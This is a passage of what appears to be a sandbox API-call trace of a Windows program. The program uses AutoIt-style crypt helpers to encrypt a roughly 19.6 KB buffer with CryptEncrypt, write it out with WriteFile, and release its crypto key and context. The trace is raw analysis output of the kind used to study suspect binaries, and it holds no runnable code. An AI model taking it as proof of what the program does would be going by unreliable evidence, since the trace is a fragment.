returned 0x43e2ad0 [0131.557] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0131.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e18 [0131.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0131.557] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0131.557] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0131.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0131.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0131.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0131.557] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.557] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0131.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0131.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0131.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0131.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0131.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43925e0 [0131.557] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafd0 [0131.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0131.557] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0131.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0131.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0131.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0131.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0131.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0131.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0131.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0131.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0131.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0131.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0131.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0131.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0131.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0131.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0131.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0131.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0131.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0131.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0131.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0131.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0131.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0131.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0131.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0131.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0131.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0131.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0131.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0131.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0131.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0131.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0131.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0131.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0131.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0131.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0131.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0131.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0131.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0131.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0131.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0131.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0131.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0131.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0131.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0131.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4c98) returned 0x49b85f0 [0131.560] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0131.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0131.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0131.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0131.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0131.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cb228 [0131.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb228, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0131.714] CryptEncrypt (in: hKey=0x41ac180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x4c98, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x4ca0) returned 1 [0131.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0131.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e97a0 [0131.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0131.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0131.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0131.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0131.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0131.715] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0131.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8cd8 [0131.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0131.715] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.715] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0131.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0131.715] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0131.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0131.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0131.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0131.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0131.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0131.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0131.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0131.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0131.715] CharLowerBuffW (in: lpsz="byte[19617]", cchLength=0xb | out: lpsz="byte[19617]") returned 0xb [0131.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0131.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0131.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0131.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0131.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0131.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0131.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0131.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0131.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0131.716] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0131.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0131.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0131.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0131.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0131.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0131.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0131.716] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0131.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0131.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0131.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0131.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0131.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0131.717] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.717] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0131.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0131.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0131.717] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0131.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0131.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0131.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0131.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0131.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cb420 [0131.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb420, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0131.717] CryptEncrypt (in: hKey=0x41ac180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49b85f0*, pdwDataLen=0x144e538*=0x4c98, dwBufLen=0x4ca0 | out: pbData=0x49b85f0*, pdwDataLen=0x144e538*=0x4ca0) returned 1 [0131.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0131.718] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.718] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.718] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.718] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.718] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.718] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.718] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0131.718] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0131.718] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0131.718] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0131.718] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0131.718] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0131.718] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0131.718] PeekMessageW (in: lpMsg=0x144e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4dc) returned 0 [0131.718] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0131.718] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0131.718] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.718] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.718] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.719] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.719] WriteFile (in: hFile=0x258, lpBuffer=0x49aecb8*, nNumberOfBytesToWrite=0x4ca0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x49aecb8*, lpNumberOfBytesWritten=0x144ef3c*=0x4ca0, lpOverlapped=0x0) returned 1 [0131.720] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.720] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.720] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0131.720] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0131.720] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.721] PeekMessageW (in: lpMsg=0x144e714, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e714) returned 0 [0131.721] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0131.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43caf28, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0131.721] CryptDestroyKey (hKey=0x41ac180) returned 1 [0131.721] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0131.721] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0131.721] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0131.721] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0131.721] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0131.721] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0131.721] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0131.721] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0131.721] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0131.721] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0131.721] PeekMessageW (in: lpMsg=0x144e6ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6ec) returned 0 [0131.721] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0131.721] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0131.721] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0131.721] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0131.721] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.722] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0131.722] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.722] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0131.722] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0131.722] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0131.722] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.722] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0131.722] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0131.722] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.722] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.722] PeekMessageW (in: lpMsg=0x144e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9fc) returned 0 [0131.722] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0131.722] PeekMessageW (in: lpMsg=0x144e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9fc) returned 0 [0131.722] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 